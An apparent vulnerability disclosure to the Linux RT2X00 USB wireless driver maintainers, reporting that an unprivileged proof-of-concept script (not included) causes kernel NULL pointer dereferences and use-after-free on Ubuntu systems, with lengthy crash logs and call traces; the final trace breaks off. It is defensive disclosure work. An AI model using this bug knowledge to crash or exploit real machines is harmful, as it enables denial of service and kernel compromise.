Dear RT2X00 driver maintainers,
We have discovered a critical vulnerability in the RT2X00 driver. We recommend urgently submitting an update.
Vulnerability Description: When a PC is running Ubuntu 22.04 or 24.04, executing our proof of concept (POC) can directly cause a null pointer dereference or use-after-free (UAF). The systems we tested were:
- Description: Ubuntu 22.04.4 LTS Release: 22.04
- Description: Ubuntu 24.04 LTS Release: 24.04
We tested network cards from the RT2870/RT3070/RT5370 series, which all belong to the RT2X00 driver group, and all were able to trigger the vulnerability. Additionally, executing the POC requires only user-level privileges. Debian systems are not affected.
Now, there are a few issues that need to be discussed. When executing the POC on different PCs, it not only triggers a null pointer dereference but also occasionally triggers a use-after-free (UAF) issue. You can test this issue yourselves.
POC Execution Method:
python3 poc.py
Some systems might be affected by the time.sleep function. If you cannot successfully reproduce the issue, please modify time.sleep(0.1) in the script to time.sleep(0.2). Below, I will provide the logs of the null pointer dereference and UAF from our kernel for analysis.
Replace the VID and PID with your USB network card ID, which you can check using lsusb.
--------------
Crash Log-Null Pointer
[ 371.188382] ieee80211 phy23: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin'
[ 371.188467] ieee80211 phy23: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36
[ 371.258315] BUG: kernel NULL pointer dereference, address: 0000000000000038
[ 371.258324] #PF: supervisor write access in kernel mode
[ 371.258328] #PF: error_code(0x0002) - not-present page
[ 371.258330] PGD 0 P4D 0
[ 371.258335] Oops: 0002 [#1] PREEMPT SMP NOPTI
[ 371.258339] CPU: 8 PID: 144 Comm: kworker/u40:2 Not tainted 6.8.0-40-generic #40~22.04.2-Ubuntu
[ 371.258344] Hardware name: Dell Inc. Vostro 3710/072TMP, BIOS 1.1.66 06/22/2022
[ 371.258346] Workqueue: phy23 rt2x00usb_work_rxdone [rt2x00usb]
[ 371.258363] RIP: 0010:rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb]
[ 371.258374] Code: 00 48 c7 45 d0 00 00 00 00 48 c7 45 d8 00 00 00 00 48 c7 45 e0 00 00 00 00 74 45 4c 8d 65 c8 eb 2b 48 8b 47 18 be c0 0c 00 00 <4c> 89 60 38 48 8b 57 10 0f b6 52 6a 88 50 31 e8 8d cc ec ff 48 8b
[ 371.258377] RSP: 0018:ffffa1de4063fe08 EFLAGS: 00010246
[ 371.258381] RAX: 0000000000000000 RBX: ffff8b1ef7366a90 RCX: 0000000000000000
[ 371.258383] RDX: 0000000000000000 RSI: 0000000000000cc0 RDI: ffff8b1d0be0e000
[ 371.258386] RBP: ffffa1de4063fe40 R08: 0000000000000000 R09: 0000000000000000
[ 371.258388] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa1de4063fe08
[ 371.258390] R13: ffff8b1d001fcc00 R14: ffff8b1d0a838e05 R15: ffff8b1ef7366a90
[ 371.258392] FS: 0000000000000000(0000) GS:ffff8b207f600000(0000) knlGS:0000000000000000
[ 371.258395] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 371.258397] CR2: 0000000000000038 CR3: 000000044d43c000 CR4: 0000000000f50ef0
[ 371.258400] PKRU: 55555554
[ 371.258402] Call Trace:
[ 371.258405] <TASK>
[ 371.258408] ? show_regs+0x6d/0x80
[ 371.258416] ? __die+0x24/0x80
[ 371.258419] ? page_fault_oops+0x99/0x1b0
[ 371.258425] ? do_user_addr_fault+0x2ed/0x670
[ 371.258430] ? exc_page_fault+0x83/0x1b0
[ 371.258437] ? asm_exc_page_fault+0x27/0x30
[ 371.258444] ? rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb]
[ 371.258454] ? rt2x00usb_work_rxdone+0x8b/0xc0 [rt2x00usb]
[ 371.258463] process_one_work+0x16c/0x350
[ 371.258470] worker_thread+0x306/0x440
[ 371.258476] ? __pfx_worker_thread+0x10/0x10
[ 371.258482] kthread+0xef/0x120
[ 371.258486] ? __pfx_kthread+0x10/0x10
[ 371.258491] ret_from_fork+0x44/0x70
[ 371.258495] ? __pfx_kthread+0x10/0x10
[ 371.258499] ret_from_fork_asm+0x1b/0x30
[ 371.258505] </TASK>
[ 371.258506] Modules linked in: ccm snd_hda_codec_hdmi rfcomm xe snd_hda_codec_cs8409 snd_hda_codec_generic drm_gpuvm drm_exec gpu_sched drm_suballoc_helper drm_ttm_helper cmac algif_hash overlay algif_skcipher af_alg bnep intel_uncore_frequency intel_uncore_frequency_common snd_sof_pci_intel_tgl x86_pkg_temp_thermal snd_sof_intel_hda_common intel_powerclamp coretemp soundwire_intel snd_sof_intel_hda_mlink soundwire_cadence snd_sof_intel_hda kvm_intel snd_sof_pci snd_sof_xtensa_dsp snd_sof kvm snd_sof_utils snd_soc_hdac_hda snd_hda_ext_core snd_soc_acpi_intel_match snd_soc_acpi soundwire_generic_allocation irqbypass soundwire_bus crct10dif_pclmul polyval_clmulni polyval_generic ghash_clmulni_intel binfmt_misc snd_usb_audio snd_soc_core sha256_ssse3 sha1_ssse3 snd_usbmidi_lib aesni_intel rtw88_8821ce snd_compress snd_ump ac97_bus mc rtw88_8821c rt2800usb snd_pcm_dmaengine rtw88_pci rt2x00usb crypto_simd cryptd snd_hda_intel rt2800lib dell_wmi snd_seq_midi snd_intel_dspcfg rtw88_core snd_intel_sdw_acpi snd_seq_midi_event
[ 371.258573] rt2x00lib dell_smbios rapl snd_hda_codec btusb snd_rawmidi mei_pxp mei_hdcp intel_rapl_msr dcdbas nls_iso8859_1 intel_cstate i915 mac80211 snd_hda_core dell_wmi_ddv btrtl snd_seq dell_smm_hwmon processor_thermal_device_pci snd_hwdep btintel cmdlinepart processor_thermal_device drm_buddy dell_wmi_sysman btbcm ledtrig_audio processor_thermal_wt_hint ttm firmware_attributes_class sparse_keymap dell_wmi_descriptor wmi_bmof snd_pcm spi_nor btmtk processor_thermal_rfim snd_seq_device mtd ee1004 snd_timer drm_display_helper processor_thermal_rapl cfg80211 bluetooth intel_rapl_common cec snd mei_me pl2303 processor_thermal_wt_req rc_core ecdh_generic processor_thermal_power_floor usbserial input_leds joydev mei i2c_algo_bit libarc4 ecc soundcore processor_thermal_mbox int340x_thermal_zone intel_pmc_core intel_vsec int3400_thermal pmt_telemetry acpi_thermal_rel pmt_class acpi_tad acpi_pad mac_hid sch_fq_codel msr parport_pc ppdev lp parport efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid nvme
[ 371.258648] crc32_pclmul i2c_i801 spi_intel_pci nvme_core i2c_smbus r8169 spi_intel ahci nvme_auth xhci_pci video xhci_pci_renesas libahci realtek wmi
[ 371.258665] CR2: 0000000000000038
[ 371.258668] ---[ end trace 0000000000000000 ]---
[ 371.785813] RIP: 0010:rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb]
[ 371.785851] Code: 00 48 c7 45 d0 00 00 00 00 48 c7 45 d8 00 00 00 00 48 c7 45 e0 00 00 00 00 74 45 4c 8d 65 c8 eb 2b 48 8b 47 18 be c0 0c 00 00 <4c> 89 60 38 48 8b 57 10 0f b6 52 6a 88 50 31 e8 8d cc ec ff 48 8b
[ 371.785854] RSP: 0018:ffffa1de4063fe08 EFLAGS: 00010246
[ 371.785861] RAX: 0000000000000000 RBX: ffff8b1ef7366a90 RCX: 0000000000000000
[ 371.785863] RDX: 0000000000000000 RSI: 0000000000000cc0 RDI: ffff8b1d0be0e000
[ 371.785864] RBP: ffffa1de4063fe40 R08: 0000000000000000 R09: 0000000000000000
[ 371.785866] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa1de4063fe08
[ 371.785867] R13: ffff8b1d001fcc00 R14: ffff8b1d0a838e05 R15: ffff8b1ef7366a90
[ 371.785868] FS: 0000000000000000(0000) GS:ffff8b207f600000(0000) knlGS:0000000000000000
[ 371.785870] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 371.785872] CR2: 0000000000000038 CR3: 000000011dc92000 CR4: 0000000000f50ef0
[ 371.785873] PKRU: 55555554
[ 371.785876] note: kworker/u40:2[144] exited with irqs disabled
[ 371.793418] ieee80211 phy23: rt2800_wait_bbp_ready: Error - BBP register access failed, aborting
[ 371.793422] ieee80211 phy23: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5)
[ 371.799526] systemd-journald[438]: Compressed data object 1029 -> 509 using ZSTD
[ 371.799553] systemd-journald[438]: Compressed data object 1020 -> 543 using ZSTD
[ 387.857111] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 387.857138] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 387.861450] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 387.861472] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 387.865327] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 387.865344] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 387.872995] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 387.873032] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 387.961986] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 387.962012] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 388.018331] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 388.018398] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 388.067180] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 388.067201] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 388.323049] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 388.323086] systemd-journald[438]: Successfully sent stream file descriptor to service manager.
[ 453.167476] systemd-journald[438]: Sent WATCHDOG=1 notification.
LOG-Crash-2:UAF
[ +0.000002] refcount_t: addition on 0; use-after-free.
[ +0.000006] WARNING: CPU: 16 PID: 754 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x150
[ +0.000007] Modules linked in: rt2800usb rt2x00usb rt2800lib rt2x00lib tcp_diag inet_diag bnep nfnetlink_queue nfnetlink_log bluetooth ecdh_generic ecc usbmon nf_conntrack_netlink xfrm_user xfrm_algo xt_addrtype br_netfilter ccm xt_CHECKSUM xt_MASQUERADE xt_conntrack ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink bridge stp llc overlay intel_rapl_msr intel_rapl_common snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg mt7921u mt76x2u snd_intel_sdw_acpi mt7921_common mt76x2_common edac_mce_amd amdgpu snd_hda_codec mt76_connac_lib mt76x02_usb mt76x02_lib mt76_usb snd_hda_core kvm_amd snd_hwdep mt76 binfmt_misc kvm snd_pcm irqbypass mac80211 crct10dif_pclmul snd_seq_midi amdxcp polyval_clmulni snd_seq_midi_event iommu_v2 polyval_generic drm_buddy ghash_clmulni_intel sha256_ssse3 snd_rawmidi gpu_sched sha1_ssse3 drm_suballoc_helper aesni_intel drm_ttm_helper nls_iso8859_1 ttm crypto_simd
[ +0.000095] snd_seq cryptd cfg80211 drm_display_helper snd_seq_device snd_timer cec rapl rc_core joydev input_leds libarc4 drm_kms_helper eeepc_wmi snd wmi_bmof i2c_algo_bit k10temp soundcore ccp mac_hid sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci libahci nvme_core xhci_pci_renesas realtek nvme_common wmi
[ +0.000063] CPU: 16 PID: 754 Comm: NetworkManager Not tainted 6.5.0-41-generic #41~22.04.2-Ubuntu
[ +0.000003] Hardware name: System manufacturer System Product Name/TUF GAMING X570-PLUS, BIOS 3603 03/20/2021
[ +0.000001] RIP: 0010:refcount_warn_saturate+0x12e/0x150
[ +0.000003] Code: 1d a5 cc dc 01 80 fb 01 0f 87 6c f8 8d 00 83 e3 01 0f 85 52 ff ff ff 48 c7 c7 10 c0 1c a8 c6 05 85 cc dc 01 01 e8 d2 9f 8f ff <0f> 0b e9 38 ff ff ff 48 c7 c7 e8 bf 1c a8 c6 05 6c cc dc 01 01 e8
[ +0.000002] RSP: 0018:ffffb0fe4126f4e8 EFLAGS: 00010246
[ +0.000003] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[ +0.000002] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
[ +0.000001] RBP: ffffb0fe4126f4f0 R08: 0000000000000000 R09: 0000000000000000
[ +0.000001] R10: 0000000000000000 R11: 0000000000000000 R12: ffff919769c2e800
[ +0.000002] R13: ffff91954a975000 R14: 0000000000000820 R15: 00000000ffffff00
[ +0.000002] FS: 00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) knlGS:0000000000000000
[ +0.000002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ +0.000001] CR2: 00000000dc9cae6c CR3: 000000011e4ce000 CR4: 0000000000750ee0
[ +0.000002] PKRU: 55555554
[ +0.000001] Call Trace:
[ +0.000002] <TASK>
[ +0.000003] ? show_regs+0x6d/0x80
[ +0.000005] ? __warn+0x89/0x160
[ +0.000004] ? refcount_warn_saturate+0x12e/0x150
[ +0.000003] ? report_bug+0x17e/0x1b0
[ +0.000005] ? handle_bug+0x46/0x90
[ +0.000004] ? exc_invalid_op+0x18/0x80
[ +0.000003] ? asm_exc_invalid_op+0x1b/0x20
[ +0.000006] ? refcount_warn_saturate+0x12e/0x150
[ +0.000003] ? refcount_warn_saturate+0x12e/0x150
[ +0.000003] usb_get_urb+0x52/0x90
[ +0.000004] usb_hcd_submit_urb+0x23/0x2e0
[ +0.000003] usb_submit_urb+0x254/0x6c0
[ +0.000006] rt2x00usb_kick_rx_entry+0xab/0xf0 [rt2x00usb]
[ +0.000006] rt2x00usb_clear_entry+0x2c/0x40 [rt2x00usb]
[ +0.000005] rt2x00queue_init_queues+0xa5/0x100 [rt2x00lib]
[ +0.000008] rt2x00lib_enable_radio+0x28/0xb0 [rt2x00lib]
[ +0.000007] rt2x00lib_start+0x87/0xd0 [rt2x00lib]
[ +0.000007] rt2x00mac_start+0x2d/0x80 [rt2x00lib]
[ +0.000007] drv_start+0x55/0x130 [mac80211]
[ +0.000033] ieee80211_do_open+0x353/0x7e0 [mac80211]
[ +0.000030] ieee80211_open+0x76/0xa0 [mac80211]
[ +0.000027] __dev_open+0x105/0x1d0
[ +0.000004] __dev_change_flags+0x1b5/0x230
[ +0.000003] dev_change_flags+0x27/0x80
[ +0.000003] do_setlink+0x3a1/0xe60
[ +0.000004] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000003] ? __nla_validate_parse+0x49/0x1e0
[ +0.000005] __rtnl_newlink+0x6e5/0x770
[ +0.000005] rtnl_newlink+0x48/0x80
[ +0.000003] rtnetlink_rcv_msg+0x170/0x430
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000003] ? __pfx_rtnetlink_rcv_msg+0x10/0x10
[ +0.000002] netlink_rcv_skb+0x5d/0x110
[ +0.000005] rtnetlink_rcv+0x15/0x30
[ +0.000003] netlink_unicast+0x1b3/0x2a0
[ +0.000002] netlink_sendmsg+0x25e/0x4e0
[ +0.000004] ____sys_sendmsg+0x3ef/0x420
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000003] ___sys_sendmsg+0x9a/0xf0
[ +0.000004] ? kvfree+0x31/0x40
[ +0.000005] __sys_sendmsg+0x89/0xf0
[ +0.000004] __x64_sys_sendmsg+0x1d/0x30
[ +0.000001] x64_sys_call+0x114d/0x20b0
[ +0.000003] do_syscall_64+0x55/0x90
[ +0.000002] ? __rseq_handle_notify_resume+0x37/0x70
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000002] ? exit_to_user_mode_loop+0xe5/0x130
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000002] ? exit_to_user_mode_prepare+0x30/0xb0
[ +0.000001] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000002] ? syscall_exit_to_user_mode+0x37/0x60
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000001] ? do_syscall_64+0x61/0x90
[ +0.000002] ? do_syscall_64+0x61/0x90
[ +0.000002] entry_SYSCALL_64_after_hwframe+0x73/0xdd
[ +0.000002] RIP: 0033:0x7bfb4872799d
[ +0.000021] Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 6a 90 f6 ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 ae 90 f6 ff 48
[ +0.000001] RSP: 002b:00007ffd73cd3280 EFLAGS: 00000293 ORIG_RAX: 000000000000002e
[ +0.000002] RAX: ffffffffffffffda RBX: 00000000000004a3 RCX: 00007bfb4872799d
[ +0.000002] RDX: 0000000000000000 RSI: 00007ffd73cd32c0 RDI: 000000000000000c
[ +0.000001] RBP: 000055d422a2e030 R08: 0000000000000000 R09: 0000000000000000
[ +0.000001] R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000
[ +0.000001] R13: 00007ffd73cd3410 R14: 00007ffd73cd340c R15: 0000000000000000
[ +0.000003] </TASK>
[ +0.000001] ---[ end trace 0000000000000000 ]---
[ +0.000004] ------------[ cut here ]------------
[ +0.000001] refcount_t: underflow; use-after-free.
[ +0.000004] WARNING: CPU: 16 PID: 754 at lib/refcount.c:28 refcount_warn_saturate+0xa3/0x150
[ +0.000003] Modules linked in: rt2800usb rt2x00usb rt2800lib rt2x00lib tcp_diag inet_diag bnep nfnetlink_queue nfnetlink_log bluetooth ecdh_generic ecc usbmon nf_conntrack_netlink xfrm_user xfrm_algo xt_addrtype br_netfilter ccm xt_CHECKSUM xt_MASQUERADE xt_conntrack ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink bridge stp llc overlay intel_rapl_msr intel_rapl_common snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg mt7921u mt76x2u snd_intel_sdw_acpi mt7921_common mt76x2_common edac_mce_amd amdgpu snd_hda_codec mt76_connac_lib mt76x02_usb mt76x02_lib mt76_usb snd_hda_core kvm_amd snd_hwdep mt76 binfmt_misc kvm snd_pcm irqbypass mac80211 crct10dif_pclmul snd_seq_midi amdxcp polyval_clmulni snd_seq_midi_event iommu_v2 polyval_generic drm_buddy ghash_clmulni_intel sha256_ssse3 snd_rawmidi gpu_sched sha1_ssse3 drm_suballoc_helper aesni_intel drm_ttm_helper nls_iso8859_1 ttm crypto_simd
[ +0.000055] snd_seq cryptd cfg80211 drm_display_helper snd_seq_device snd_timer cec rapl rc_core joydev input_leds libarc4 drm_kms_helper eeepc_wmi snd wmi_bmof i2c_algo_bit k10temp soundcore ccp mac_hid sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci libahci nvme_core xhci_pci_renesas realtek nvme_common wmi
[ +0.000036] CPU: 16 PID: 754 Comm: NetworkManager Tainted: G W 6.5.0-41-generic #41~22.04.2-Ubuntu
[ +0.000002] Hardware name: System manufacturer System Product Name/TUF GAMING X570-PLUS, BIOS 3603 03/20/2021
[ +0.000001] RIP: 0010:refcount_warn_saturate+0xa3/0x150
[ +0.000002] Code: 94 00 0f b6 1d 2b cd dc 01 80 fb 01 0f 87 df f8 8d 00 83 e3 01 75 dd 48 c7 c7 40 c0 1c a8 c6 05 0f cd dc 01 01 e8 5d a0 8f ff <0f> 0b eb c6 0f b6 1d 02 cd dc 01 80 fb 01 0f 87 9f f8 8d 00 83 e3
[ +0.000002] RSP: 0018:ffffb0fe4126f4e8 EFLAGS: 00010246
[ +0.000001] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[ +0.000001] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
[ +0.000001] RBP: ffffb0fe4126f4f0 R08: 0000000000000000 R09: 0000000000000000
[ +0.000002] R10: 0000000000000000 R11: 0000000000000000 R12: 00000000fffffffe
[ +0.000001] R13: ffff91954a975000 R14: 0000000000000820 R15: 00000000ffffff00
[ +0.000001] FS: 00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) knlGS:0000000000000000
[ +0.000001] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ +0.000002] CR2: 00000000dc9cae6c CR3: 000000011e4ce000 CR4: 0000000000750ee0
[ +0.000001] PKRU: 55555554
[ +0.000001] Call Trace:
[ +0.000001] <TASK>
[ +0.000001] ? show_regs+0x6d/0x80
[ +0.000002] ? __warn+0x89/0x160
[ +0.000003] ? refcount_warn_saturate+0xa3/0x150
[ +0.000002] ? report_bug+0x17e/0x1b0
[ +0.000003] ? handle_bug+0x46/0x90
[ +0.000002] ? exc_invalid_op+0x18/0x80
[ +0.000003] ? asm_exc_invalid_op+0x1b/0x20
[ +0.000003] ? refcount_warn_saturate+0xa3/0x150
[ +0.000003] ? refcount_warn_saturate+0xa3/0x150
[ +0.000001] usb_free_urb+0x67/0x80
[ +0.000003] usb_hcd_submit_urb+0x14e/0x2e0
[ +0.000002] usb_submit_urb+0x254/0x6c0
[ +0.000003] rt2x00usb_kick_rx_entry+0xab/0xf0 [rt2x00usb]
[ +0.000005] rt2x00usb_clear_entry+0x2c/0x40 [rt2x00usb]
[ +0.000003] rt2x00queue_init_queues+0xa5/0x100 [rt2x00lib]
[ +0.000006] rt2x00lib_enable_radio+0x28/0xb0 [rt2x00lib]
[ +0.000005] rt2x00lib_start+0x87/0xd0 [rt2x00lib]
[ +0.000005] rt2x00mac_start+0x2d/0x80 [rt2x00lib]
[ +0.000005] drv_start+0x55/0x130 [mac80211]
[ +0.000025] ieee80211_do_open+0x353/0x7e0 [mac80211]
[ +0.000028] ieee80211_open+0x76/0xa0 [mac80211]
[ +0.000026] __dev_open+0x105/0x1d0
[ +0.000004] __dev_change_flags+0x1b5/0x230
[ +0.000003] dev_change_flags+0x27/0x80
[ +0.000003] do_setlink+0x3a1/0xe60
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000003] ? __nla_validate_parse+0x49/0x1e0
[ +0.000004] __rtnl_newlink+0x6e5/0x770
[ +0.000005] rtnl_newlink+0x48/0x80
[ +0.000002] rtnetlink_rcv_msg+0x170/0x430
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000003] ? __pfx_rtnetlink_rcv_msg+0x10/0x10
[ +0.000002] netlink_rcv_skb+0x5d/0x110
[ +0.000005] rtnetlink_rcv+0x15/0x30
[ +0.000002] netlink_unicast+0x1b3/0x2a0
[ +0.000003] netlink_sendmsg+0x25e/0x4e0
[ +0.000003] ____sys_sendmsg+0x3ef/0x420
[ +0.000002] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000004] ___sys_sendmsg+0x9a/0xf0
[ +0.000003] ? kvfree+0x31/0x40
[ +0.000004] __sys_sendmsg+0x89/0xf0
[ +0.000004] __x64_sys_sendmsg+0x1d/0x30
[ +0.000002] x64_sys_call+0x114d/0x20b0
[ +0.000002] do_syscall_64+0x55/0x90
[ +0.000001] ? __rseq_handle_notify_resume+0x37/0x70
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000002] ? exit_to_user_mode_loop+0xe5/0x130
[ +0.000002] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000001] ? exit_to_user_mode_prepare+0x30/0xb0
[ +0.000002] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000002] ? syscall_exit_to_user_mode+0x37/0x60
[ +0.000002] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000002] ? do_syscall_64+0x61/0x90
[ +0.000001] ? do_syscall_64+0x61/0x90
[ +0.000002] entry_SYSCALL_64_after_hwframe+0x73/0xdd
[ +0.000002] RIP: 0033:0x7bfb4872799d
[ +0.000005] Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 6a 90 f6 ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 ae 90 f6 ff 48
[ +0.000002] RSP: 002b:00007ffd73cd3280 EFLAGS: 00000293 ORIG_RAX: 000000000000002e
[ +0.000002] RAX: ffffffffffffffda RBX: 00000000000004a3 RCX: 00007bfb4872799d
[ +0.000001] RDX: 0000000000000000 RSI: 00007ffd73cd32c0 RDI: 000000000000000c
[ +0.000001] RBP: 000055d422a2e030 R08: 0000000000000000 R09: 0000000000000000
[ +0.000001] R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000
[ +0.000001] R13: 00007ffd73cd3410 R14: 00007ffd73cd340c R15: 0000000000000000
[ +0.000003] </TASK>
[ +0.000001] ---[ end trace 0000000000000000 ]---
[ +0.000002] BUG: unable to handle page fault for address: 00000000000011b0
[ +0.000003] #PF: supervisor read access in kernel mode
[ +0.000001] #PF: error_code(0x0000) - not-present page
[ +0.000002] PGD 0 P4D 0
[ +0.000003] Oops: 0000 [#1] PREEMPT SMP NOPTI
[ +0.000002] CPU: 16 PID: 754 Comm: NetworkManager Tainted: G W 6.5.0-41-generic #41~22.04.2-Ubuntu
[ +0.000002] Hardware name: System manufacturer System Product Name/TUF GAMING X570-PLUS, BIOS 3603 03/20/2021
[ +0.000001] RIP: 0010:rt2x00usb_clear_entry+0x5/0x40 [rt2x00usb]
[ +0.000004] Code: d2 31 c9 31 f6 31 ff 45 31 c0 e9 e6 1a 90 e5 66 0f 1f 44 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 <48> 8b 47 10 48 c7 07 00 00 00 00 83 78 10 0e 74 0b 31 c0 31 f6 31
[ +0.000002] RSP: 0018:ffffb0fe4126f5e0 EFLAGS: 00010206
[ +0.000002] RAX: ffffffffc20411f0 RBX: 000000000000005f RCX: 0000000000000000
[ +0.000001] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00000000000011a0
[ +0.000002] RBP: ffffb0fe4126f600 R08: 0000000000000000 R09: 0000000000000000
[ +0.000001] R10: 0000000000000000 R11: 0000000000000000 R12: ffff919567fab4f0
[ +0.000002] R13: ffff9198efd9e060 R14: ffff9198efd9c900 R15: ffff9196786a4000
[ +0.000001] FS: 00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) knlGS:0000000000000000
[ +0.000002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ +0.000002] CR2: 00000000000011b0 CR3: 000000011e4ce000 CR4: 0000000000750ee0
[ +0.000001] PKRU: 55555554
[ +0.000001] Call Trace:
[ +0.000002] <TASK>
[ +0.000001] ? show_regs+0x6d/0x80
[ +0.000003] ? __die+0x24/0x80
[ +0.000003] ? page_fault_oops+0x99/0x1b0
[ +0.000004] ? do_user_addr_fault+0x31d/0x6b0
[ +0.000003] ? exc_page_fault+0x83/0x1b0
[ +0.000003] ? asm_exc_page_fault+0x27/0x30
[ +0.000003] ? __pfx_rt2x00usb_clear_entry+0x10/0x10 [rt2x00usb]
[ +0.000004] ? rt2x00usb_clear_entry+0x5/0x40 [rt2x00usb]
[ +0.000005] ? rt2x00queue_init_queues+0xa5/0x100 [rt2x00lib]
[ +0.000005] rt2x00lib_enable_radio+0x28/0xb0 [rt2x00lib]
[ +0.000006] rt2x00lib_start+0x87/0xd0 [rt2x00lib]
[ +0.000005] rt2x00mac_start+0x2d/0x80 [rt2x00lib]
[ +0.000006] drv_start+0x55/0x130 [mac80211]
[ +0.000025] ieee80211_do_open+0x353/0x7e0 [mac80211]
[ +0.000028] ieee80211_open+0x76/0xa0 [mac80211]
[ +0.000027] __dev_open+0x105/0x1d0
[ +0.000004] __dev_change_flags+0x1b5/0x230
[ +0.000003] dev_change_flags+0x27/0x80
[ +0.000004] do_setlink+0x3a1/0xe60
[ +0.000004] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000002] ? __nla_validate_parse+0x49/0x1e0
[ +0.000004] __rtnl_newlink+0x6e5/0x770
[ +0.000006] rtnl_newlink+0x48/0x80
[ +0.000003] rtnetlink_rcv_msg+0x170/0x430
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000003] ? __pfx_rtnetlink_rcv_msg+0x10/0x10
[ +0.000003] netlink_rcv_skb+0x5d/0x110
[ +0.000005] rtnetlink_rcv+0x15/0x30
[ +0.000002] netlink_unicast+0x1b3/0x2a0
[ +0.000003] netlink_sendmsg+0x25e/0x4e0
[ +0.000004] ____sys_sendmsg+0x3ef/0x420
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000003] ___sys_sendmsg+0x9a/0xf0
[ +0.000004] ? kvfree+0x31/0x40
[ +0.000005] __sys_sendmsg+0x89/0xf0
[ +0.000004] __x64_sys_sendmsg+0x1d/0x30
[ +0.000002] x64_sys_call+0x114d/0x20b0
[ +0.000002] do_syscall_64+0x55/0x90
[ +0.000002] ? __rseq_handle_notify_resume+0x37/0x70
[ +0.000003] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000002] ? exit_to_user_mode_loop+0xe5/0x130
[ +0.000002] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000003] ? exit_to_user_mode_prepare+0x30/0xb0
